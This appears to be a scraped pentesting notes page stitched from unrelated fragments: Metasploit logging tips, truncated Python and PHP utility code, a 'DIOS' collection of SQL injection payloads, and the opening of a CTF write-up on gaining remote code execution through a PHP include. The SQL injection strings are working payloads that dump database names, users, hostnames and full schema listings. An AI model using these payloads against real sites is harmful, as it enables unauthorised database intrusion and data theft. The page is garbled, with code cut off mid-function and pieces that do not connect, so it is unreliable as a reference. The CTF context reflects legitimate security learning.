Remember to log all the things!
- Metasploit - spool /home//.msf3/logs/console.log
- Save contents from each terminal!
- Linux - script myoutput.txt # Type exit to stop
#!/usr/bin/env python | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
""" |
<?php | |
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40 | |
class DumpHTTPRequestToFile { | |
public function execute($targetFile) { | |
$data = sprintf( | |
"%s %s %s\n\nHTTP headers:\n", | |
$_SERVER['REQUEST_METHOD'], | |
$_SERVER['REQUEST_URI'], | |
$_SERVER['SERVER_PROTOCOL'] |
DIOS (Dump In One Shot) Collection | |
======================================= | |
concat_ws('<br>','zet',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database()))) | |
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x) | |
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x) |
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.